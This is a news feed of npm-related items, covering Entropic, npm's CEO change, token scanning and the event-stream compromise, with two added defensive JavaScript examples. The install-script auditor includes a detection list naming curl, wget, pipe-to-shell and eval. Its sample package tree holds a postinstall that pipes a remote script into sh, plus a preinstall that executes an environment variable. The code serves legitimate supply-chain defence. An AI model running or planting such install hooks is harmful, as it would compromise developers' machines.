
npm

npm is a package manager for JavaScript included with Node.js.

The Changelog #355

Federating JavaScript's language commons with Entropic

We’re joined by C J Silverio, aka ceejbot on Twitter, aka 2nd hire and former CTO at npm Inc. We talk with Ceej about her recent JS Conf EU talk titled “The Economies of Open Source” where she laid out her concerns with the JavaScript language commons being owned by venture capitalists. Currently the JavaScript language commons is controlled by the npm registry, and as you may know, npm is a VC-backed, for-profit startup. Of course we also talk with Ceej about the bomb she dropped, Entropic, at the end of that talk: a federated package registry for JavaScript that C J hopes will unseat npm and free the JavaScript language commons.


Thomas Claburn theregister.co.uk

npm, Inc settled its labor rights union-busting battle

With the settlement behind it, npm, Inc can now turn its attention toward repairing relationships with the JavaScript community and generating enough revenue to sustain itself. I’d like to know what the current sentiment is towards npm after this settlement. Can they mend these community fences? Or, are you more hopeful of the “development of alternative technologies” as mentioned in this post?


npm blog.npmjs.org

npm token scanning extending to GitHub

The npm team is collaborating with GitHub on a new service that will automatically check for tokens that might have been accidentally pushed up to a repository and then automatically revoke them if they are valid. This will help to quickly mitigate attack vectors that might arise from the accidental oversharing of credentials for projects. From the post: Whenever you commit or push a change to GitHub in a public repository and an npm token is found in the change, it is sent to npm for validation. If it’s valid, we will revoke it and notify the maintainer of this action via email.
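The GitHub/npm service above catches tokens after they have been pushed; the cheaper place to catch them is in a pre-commit hook, before they leave the machine. The following is an added example, not code from npm or GitHub: it scans the added lines of a staged diff for npm-token-shaped values. The patterns are this example's assumptions about npm's token formats, not an official specification, and every token-looking value in the sample diff is a made-up placeholder.

```javascript
// Added example (not npm's or GitHub's scanner): a local check for npm tokens in
// text about to be committed, so a leak is caught before it ever reaches GitHub.
// The token patterns are assumptions about npm's formats, not an official spec:
//  - "npm_" followed by 36 alphanumerics (the prefixed format npm introduced later)
//  - a .npmrc "_authToken=" line holding a literal value rather than an env reference
//  - a bare UUID on such a line (the older, unprefixed token format)
const NPM_TOKEN_RE = /\bnpm_[A-Za-z0-9]{36}\b/;
const AUTH_LINE_RE = /\/\/[^\s=]+\/:_authToken\s*=\s*(\S+)/;
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
const ENV_REF_RE = /^\$\{?[A-Za-z_][A-Za-z0-9_]*\}?$/; // ${NPM_TOKEN} or $NPM_TOKEN

// Show only the ends of a secret when reporting it, never the whole value.
function redact(value) {
  return value.length <= 8 ? '***' : value.slice(0, 4) + '...' + value.slice(-4);
}

// Classify one line of text; returns null when nothing looks like a credential.
function classifyLine(line) {
  const m = NPM_TOKEN_RE.exec(line);
  if (m) return { kind: 'npm-token', value: m[0] };
  const a = AUTH_LINE_RE.exec(line);
  if (!a) return null;
  const value = a[1].replace(/^["']|["']$/g, '');
  if (ENV_REF_RE.test(value)) return null;              // injected at runtime: fine
  if (UUID_RE.test(value)) return { kind: 'legacy-token', value };
  return { kind: 'authToken-literal', value };          // unknown literal, still a leak
}

// Scan plain text, or only the added lines of a unified diff when diff=true.
function findNpmTokens(text, { diff = false } = {}) {
  const findings = [];
  text.split('\n').forEach((raw, idx) => {
    let line = raw;
    if (diff) {
      if (!raw.startsWith('+') || raw.startsWith('+++')) return; // skip context/removed/headers
      line = raw.slice(1);
    }
    const hit = classifyLine(line);
    if (hit) findings.push({ line: idx + 1, kind: hit.kind, redacted: redact(hit.value) });
  });
  return findings;
}

// Constructed sample diff; every token-looking value below is a made-up placeholder.
const SAMPLE_DIFF = [
  '--- /dev/null',
  '+++ b/.npmrc',
  '@@ -0,0 +1,3 @@',
  '+registry=https://registry.npmjs.org/',
  '+//registry.npmjs.org/:_authToken=${NPM_TOKEN}',
  '+//npm.pkg.github.com/:_authToken=npm_' + 'A'.repeat(36),
  '--- a/old.npmrc',
  '+++ /dev/null',
  '@@ -1 +0,0 @@',
  '-//registry.npmjs.org/:_authToken=00000000-1111-2222-3333-444444444444',
].join('\n');

// Returns the findings for the constructed diff: one hit, on the npm_ token line.
function demo() {
  return findNpmTokens(SAMPLE_DIFF, { diff: true });
}

// Hook wiring (assumed): `git diff --cached -U0 > /tmp/staged.diff && node scan.js /tmp/staged.diff`
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  const hits = findNpmTokens(require('fs').readFileSync(process.argv[2], 'utf8'), { diff: true });
  for (const h of hits) console.error(`line ${h.line}: ${h.kind} ${h.redacted}`);
  process.exit(hits.length ? 1 : 0);
}
```

Note what the scanner does not flag: an `_authToken=${NPM_TOKEN}` line is the correct way to keep a token out of the repository, and a token on a removed (`-`) diff line is already history, which is exactly why the server-side revocation above still matters.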


JavaScript github.com

Pika brings that nostalgic, 2014 simplicity to 2019 web development

Install npm dependencies that run natively in the browser… without a bundler! Pika’s mission is to make modern JavaScript more accessible by making it easier to find, publish, install, and use modern packages on npm. There’s a lot to digest here in terms of how it works (spoiler: Rollup), which packages you can use with it (spoiler: ESM required), and how it performs. On that topic: When served with HTTP/2, @pika/web installations perform better in production than single “vendor” JavaScript bundles and most custom dependency bundling strategies due to the comparable load performance + more efficient cache usage.


Founders Talk #61

Isaac Schlueter on building npm and hiring a CEO

With JavaScript in every corner of software development and npm in every corner right along with it, the rise of npm can be drawn as a hockey stick up and to the right with Isaac Schlueter at the top grinning ear to ear. After reading their recent announcement to hire a CEO, I knew it was time to talk one-on-one with Isaac about building npm and the journey of hiring his successor.


Isaac Schlueter blog.npmjs.org

npm has a new CEO

npm has faced some interesting challenges with project creator and co-founder Isaac Schlueter playing the role of leading the company AND the product. I’m excited to see how this new leadership and focus for Isaac plays out for npm and the greater JavaScript community. In this post, Isaac shares some backstory and details about this transition: Today, I’m happy to introduce Bryan Bogensberger as npm, Inc.’s CEO. He brings a wealth of experience in Open Source and a ton of excitement and expertise to help grow npm to the next level and beyond. Commercializing something like this without ruining it is no small task, and building the team to deliver on npm’s promise is a major undertaking. We’ve sketched out a business plan and strategy for the next year, and will be announcing some other key additions to the team in the coming months. Meanwhile, I’ve taken on the title of Chief Product Officer and I will be spending my time focused on the part of the problem that I love.


Jake Archibald jakearchibald.com

What happens when packages go bad?

See what a rogue, evil dependency could do to the developer, the server and the end user, plus other scenarios. Jake Archibald recently experienced a small hack (break-in) on an old website. As a thought exercise, he explored various scenarios with the kind of “powers an evil dependency could have, and what, if anything, could be done to prevent it.” Jake went on to say, … It’s been terrifying to think this through, and this is just for a static site. … For sites with a server component and database, it feels negligent to use packages you haven’t audited. With Copay, we’ve seen that attacks like this aren’t theoretical, yet the auditing task feels insurmountable.
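The most direct power a dependency has over the developer is an install-time lifecycle script, which runs as your user during `npm install` before any of its code is ever imported. As an added example that is not from Jake's post, the following lists every such hook in a dependency tree and flags commands that look like they fetch or evaluate code. The packages and commands are constructed, and the "suspicious" patterns are this example's own heuristics, not an npm feature.

```javascript
// Added example (not from Jake's post): list the install-time lifecycle scripts in a
// dependency tree, since a malicious package's easiest "power" is a script that runs
// as you during `npm install`. Packages and commands below are constructed, and the
// suspicious-command patterns are this example's own heuristics, not an npm feature.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Crude signals that an install script fetches or evaluates code rather than, say,
// compiling a native addon. Tune to taste; the point is to surface them for review.
const SUSPICIOUS = [
  /\bcurl\b/, /\bwget\b/, /\|\s*(sh|bash)\b/, /\bnode\s+-e\b/,
  /\beval\b/, /\bbase64\b/, /\bpowershell\b/,
];

// Takes parsed package.json objects and returns one record per install hook found.
function findInstallScripts(packages) {
  const found = [];
  for (const pkg of packages) {
    const scripts = (pkg && pkg.scripts) || {};
    for (const hook of INSTALL_HOOKS) {
      const command = scripts[hook];
      if (typeof command !== 'string') continue;
      found.push({
        name: pkg.name,
        version: pkg.version,
        hook,
        command,
        suspicious: SUSPICIOUS.some((re) => re.test(command)),
      });
    }
  }
  return found;
}

// Collect every package.json under a real node_modules directory (handles @scoped
// packages and nested node_modules). Only used when a path is passed on the CLI.
function walkNodeModules(dir, out = []) {
  const fs = require('fs');
  const path = require('path');
  if (!fs.existsSync(dir)) return out;
  for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
    if (!ent.isDirectory() || ent.name.startsWith('.')) continue;
    const full = path.join(dir, ent.name);
    if (ent.name.startsWith('@')) { walkNodeModules(full, out); continue; }
    const pj = path.join(full, 'package.json');
    if (fs.existsSync(pj)) {
      try { out.push(JSON.parse(fs.readFileSync(pj, 'utf8'))); } catch (e) { /* skip unparsable */ }
    }
    walkNodeModules(path.join(full, 'node_modules'), out);
  }
  return out;
}

// Constructed sample tree: one ordinary package, one native addon build, and two
// that look like the scenarios above. None of these are real published packages.
const SAMPLE_TREE = [
  { name: 'plain-utils', version: '1.0.0', scripts: { test: 'mocha' } },
  { name: 'native-addon', version: '2.1.0', scripts: { install: 'node-gyp rebuild' } },
  { name: 'totally-fine', version: '0.0.3',
    scripts: { postinstall: 'curl -s https://example.invalid/x.sh | sh' } },
  { name: '@acme/helper', version: '3.3.3',
    scripts: { preinstall: 'node -e "require(\'child_process\').exec(process.env.X)"' } },
];

// Returns the hook records for the constructed tree: three hooks, two suspicious.
function demo() {
  return findInstallScripts(SAMPLE_TREE);
}

// Usage (assumed): `node audit-scripts.js ./node_modules`
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  for (const r of findInstallScripts(walkNodeModules(process.argv[2]))) {
    console.log(`${r.suspicious ? '!!' : '  '} ${r.name}@${r.version} ${r.hook}: ${r.command}`);
  }
}
```

A `node-gyp rebuild` hook is the legitimate case this has to tolerate, which is why the output is a review list rather than a verdict. If you can live without native addons, npm's own `--ignore-scripts` flag (or `ignore-scripts=true` in `.npmrc`) removes this whole class of install-time execution; it does nothing about code that misbehaves once required, which is the rest of Jake's thought exercise.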


The Changelog #326

The insider perspective on the event-stream compromise

Adam and Jerod talk with Dominic Tarr, creator of event-stream, the I/O library that made recent news as the latest malicious package in the npm registry. event-stream was turned into malware, designed to target a very specific development environment and harvest account details and private keys from Bitcoin accounts. They talk through Dominic’s backstory as a prolific contributor to open source, his stance on this package, his work in open source, the sequence of events around the hack, how we can and should handle maintainership of open source infrastructure over the full life-cycle of the code’s usefulness, and what some best practices are for moving forward from this kind of attack.


npm github.com

Find the cost of adding a new dependency to your project

Do you have packagephobia? Maybe you should… If you don’t, you just might after using this tool: Package Phobia reports the size of an npm package before you install it. This is useful for inspecting potential dependencies or devDependencies without using up precious disk space or waiting minutes for npm install. Ain’t nobody got time for dat.


Spencer Brown mixmax.com

To yarn and back (to npm) again

Yarn and npm were discussed in-depth on JS Party #29. Spencer writes on the Mixmax blog: We tested that this flow with npm 6 would work for our needs and we suggest you do too. If you need the absolute fastest package manager, then you may still find Yarn to be best. But if you’re looking to simplify your setup, we’ve found that npm 6 recaptures a critical balance between speed and reliability. Spencer and team also shared deyarn, a command-line tool for converting your projects from Yarn to npm.

